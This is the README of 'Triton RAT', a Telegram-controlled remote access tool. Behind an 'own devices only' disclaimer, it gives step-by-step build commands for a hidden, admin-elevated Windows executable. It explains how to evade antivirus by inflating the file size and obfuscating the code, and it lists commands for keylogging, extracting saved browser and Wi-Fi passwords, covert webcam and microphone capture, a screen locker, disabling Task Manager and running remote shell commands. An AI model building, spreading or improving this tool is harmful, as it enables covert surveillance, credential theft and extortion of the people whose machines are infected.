Triton RAT is a remote administration tool designed exclusively for managing your own devices.
It must not be used for unauthorized access, surveillance, or any illegal activities.
The developer bears no responsibility for any misuse of this software.
By using this tool, you accept full responsibility for ensuring compliance with all applicable laws and regulations.
Any unauthorized or malicious use is strictly prohibited.
With this tool you can control with YOUR pc remotly using telegram
That you need only hand (2 optional) , exe file that you will get from pyinstaller and telegram account
If telegram api is not supported in your country use Triton_Rat_Proxy(I wrote about itโฌ๏ธ)
You can also build exe with builder. Triton RAT GUI Builder: Triton_RAT-gui
https://videos.sproutvideo.com/embed/4d91d6b51c1be6c0c4/77ba198aecabdde5
# PLEASE READ THE DISCLAIMER BEFORE FOLLOWING THESE STEPS
# Register account in telegram
# Create bot with botfather
# Download this project
# In the old version of Rat we used a site for obfuscation and installed pyinstaller with github repo
# But antiviruses now detect it worse than installin pyinstaller via pip
# and Virustotal will show less detection than obfuscation
# But I wouldn't be me if i didn't find an obfuscation method
# There are still decetions , but at least we make fewer of them.
$ Download pyinstaller 5.13.0 or older versions: pip install pyinstaller==5.13.0
# if you downloaded pyinstaller from pip like pip install pyinstaller
# Delete that
# also i'm recomending you to install and upgrade setuptools and pip
$ pip install --upgrade setuptools pip
# if you don't do this, problems may arise
# Download requiremets.txt
$ pip install -r requirements.txt
# change bot api in python file to your own bot
$ bot = telebot.TeleBot('your api token')
# !MAIN STEP! obfuscation will help to deceive antiviruses
$ For obfuscation we will use my python program which you can find at the link: https://github.com/WhiteeRabbit/fake_file_resizer
$ https://github.com/WhiteeRabbit/fake_file_resizer
$ You can also use websites for obfuscation, I wrote about it a little belowโฌ๏ธ
# We can increase the file size through this appalication so that antiviruses skip rat beacuse of size.
# For example if you write the size 620 mb , Antivirus Eset will skip that,and it will less detetct.
# Download fake_file_resizer, then run:
$ python fake_file_resizer.py
# Enter your exe, then enter output file name after that write output file size in mb(don't write mb).
# Without manipulations with fake_file_resizer (no obfuscated) it shows 11 detects in virustotal, but with my ip is shows only 4 detects
# Today this is the best method of obfuscation
# If you want to obfuscate CODE that I'm recomending to you these 2 websites:
# First (6 detection):https://pyob.oxyry.com/ (use this after minifying the code ,because code's too long)
# Second (5 detection): https://python-minifier.com/
# These are the best method if you don't want to use fake_file_resizer
# Don't worry it detects by not popular antiviruses
# First, copy the full code of Triton_RAT_Release.py then paste it in second link
# After that, paste minified code in Triton_RAT_Release.py, then build it with pyinstallerโฌ๏ธ
# After downloading pyinstaller run:
$ pyinstaller --onefile --noconsole --uac-admin --hidden-import telebot --hidden-import pyautogui --hidden-import cv2 --hidden-import json --hidden-import base64 --hidden-import sqlite3 --hidden-import win32crypt --hidden-import Cryptodome.Cipher.AES --hidden-import shutil --hidden-import datetime --hidden-import numpy --hidden-import pyaudio --hidden-import wave --hidden-import random --hidden-import pyttsx3 --hidden-import pynput Triton_Rat_Release.py
# Some people says that you can decrease detections count with adding --key "testname" attribute when building it with pyinstaller
# But, it didn't worked for me...
# wait for building exe
# !BOT PASSWORD IS: acd
$ run exe and bot started!
You can also build exe with gui builder:
Triton RAT GUI Builder: Triton_RAT-gui
Download app: https://github.com/WhiteeRabbit/fake_file_resizer/
Download here: https://github.com/WhiteeRabbit/fake_file_resizer/
๐๏ธ Triton_Rat_Gui Builder (Huge thanks to jayjayQy42):
Triton RAT GUI Builder: https://github.com/jayjayQy42/Triton_RAT-gui
If the telegram api does not work in your country, then use the version with a proxy. In the proxy version, everything works the same as in the regular version. But if you are not satisfied with the proxy server or the proxy server is closed, then please write this in the issues of repo or just find a proxy that works(so that it supports socks5). My proxy is free, so I am not responsible for what will happen. Use hte proxy version at your own risk. And if you change it to your paid or find a better one you can safely use it.
try:
telebot.apihelper.proxy = {
'http': 'socks5://68.71.240.210:4145' - change this to your proxy
}
bot = telebot.TeleBot('YOUR_API_TOKEN')
except Exception as e:
pass
**๐ ๏ธ System Commands**
- โ๏ธ **/start** - Start the program
- โ๏ธ **/help** - Help with commands
- ๐ **/addstartup** - Add autostart
- โจ๏ธ **/keylogger** - Start keylogger
- โ **/stopkeylogger** - Stop keylogger
- ๐ **/run [filepath]** - Run file
- ๐ง๐ปโ๐ป **/users** - Show users on the PC
- ๐ฅ๏ธ **/whoami** - Show the name of the PC
- ๐ **/tasklist** - Show running tasks
- ๐งจ **/taskkill [task]** - Kill the entered task
- ๐ค **/sleep** - Put the PC to sleep
- ๐ **/shutdown** - Shutdown the PC
- ๐ **/restart** - Restart the PC
- ๐ฅ **/altf4** - ALT + F4 (google it to find what it means)
- ๐ฃ **/cmdbomb** - Opens 10 CMD windows
- โ๏ธ **/msg [type] [title] [text]** - Displays a messagebox
*/msg types(info; warning; error; question; default or 0)*
** for ex: /msg error testtitle testtext **
## **๐ Security & Privacy**
- ๐ **/passwords** - Show saved passwords on the PC
- ๐งฑ **/wallpaper** - Change the desktop wallpaper
- ๐ชฆ **/disabletaskmgr** - Disable Task Manager
- ๐ **/enabletaskmgr** - Enable Task Manager
- โข๏ธ **/winblocker** - My own winlocker
- โฃ๏ธ **/winblocker2** - If winblocker doesn't work
## **๐ฑ Device Management**
- ๐ท **/screenshot** - Take a screenshot
- ๐๏ธ **/mic [time in seconds]** - Record the PC's microphone
- ๐น **/webscreen** - Get a screenshot from the camera
- ๐ฆ **/webcam** - Get webcam video
- ๐ฅ **/screenrecord** - Record the screen
- ๐ซ **/block** - Block user input (mouse and keyboard)
- โ
**/unblock** - Unblock user input (mouse and keyboard)
- ๐ฑ๏ธ **/mousemesstart** - Start mouse messing
- ๐ **/mousemesstop** - Stop mouse messing
- ๐ชค **/mousekill** - Disable the mouse
- ๐ญ **/mousestop** - Enable the mouse
- ๐ฑ๏ธ **/mousemove [x] [y]** - Enter x and y cordinates and mouse's pointer goes there
- ๐ **/mouseclick** - Make left click with mouse
- ๐ฑ๏ธ **/mouseright** - Make right click with mouse
- ๐ **/fullvolume** - Set volume to full
- ๐ **/volumeplus** - Increase volume by 10
- ๐ **/volumeminus** - Decrease volume by 10
- ๐๏ธ **/rotate** - Rotate monitor +90 degrees (for exmpl: entering 2 times rotates it 180 degrees)
- ๐ช **/maximize** - Maximize active window
- ๐ช **/minimize** - Minimize active window
## **๐ Networking**
- ๐ **/wifilist** - Show saved Wi-Fi networks
- ๐ **/wifipass [accesspoint]** - Show the password of a saved Wi-Fi network
- ๐ **/chrome [website URL]** - Open a website in Chrome
- ๐ **/edge [website URL]** - Open a website in Edge
- ๐ **/firefox [website URL]** - Open a website in Firefox
## **๐ถ Multimedia**
- ๐ฌ๐๐ป **/textspech [your text]** - Speak the text aloud
- ๐ต **/playsound [file path]** - Play a sound file (first upload the file using **/upload**)
- ๐ **/download [file path]** - Download a file from the PC
- ๐๏ธ **/upload** - Upload a file to the PC
- ๐ **/clipboard** - Show clipboard content
- ๐ **/changeclipboard [testcahnge]** - Change clipboard content
## **โ๏ธ Advanced Operations**
- ๐ก๏ธ **/e [command]** - Execute shell commands (shortcut)
- ๐น **/ex [command]** - Execute shell commands with long responses
- ๐ซ **/execute** - Execute shell commands my alternative of netcat in linux (works commands such as cd ,cd.. and etc...)
- *commands like cd ,cd .. and others work excellent in the /e , /ex and /execute commands.*
- ๐
**/metadata [filepath]** - Displays the file's metadata information
- โจ๏ธ **/keytype [key]** - Enter a text and that text will written with pc's keyboard
- โจ๏ธ **/keypress [key]** - Press a specific key on the keyboard
- โจ๏ธ **/keypresstwo [key1] [key2]** - Press two keys simultaneously
- โจ๏ธ **/keypressthree [key1] [key2] [key3]** - Press three keys simultaneously
- ๐ถ๏ธ **/hide** - Hide your app
- ๐ **/unhide** - Unhide your app
## **๐ฅ๏ธ System Information**
- ๐ชช **/info** - Show PC information (IP, location, country, city)
- ๐ **/pcinfo** - Info about PC's OS, system, CPU, Windows version, BIOS, etc...
- ๐ป **/shortinfo** - Show's less but, mostly the necessary information about pc
- ๐ ๏ธ **/apps** - Show installed apps on the PC
- ๐ **/batteryinfo** - Show info about battery
## **EXAMPLES:**
- ๐ **/examples** - Shows examples
## **๐ฑ๐คณ๐ปMy Socials:๐๐ฒ**
- ๐ **/github** - [**My github**]
Triton RAT is a remote administration tool designed exclusively for managing your own devices.
It must not be used for unauthorized access, surveillance, or any illegal activities.
The developer bears no responsibility for any misuse of this software.
By using this tool, you accept full responsibility for ensuring compliance with all applicable laws and regulations.
Any unauthorized or malicious use is strictly prohibited.
- New interface and desing
- Added more than 10 new functions(also keylogger,metadata ,pc info and etc...)
- Added: minimaze ,maximize ,rotate monitor ,metadata ,keylogger, block/unblock user input ,better information about pc (from bios to battery) and etc...
โบ๏ธ - Added proxy version
- Fixed bugs
This project is licensed under the MIT License. For more details, please refer to the LICENSE file.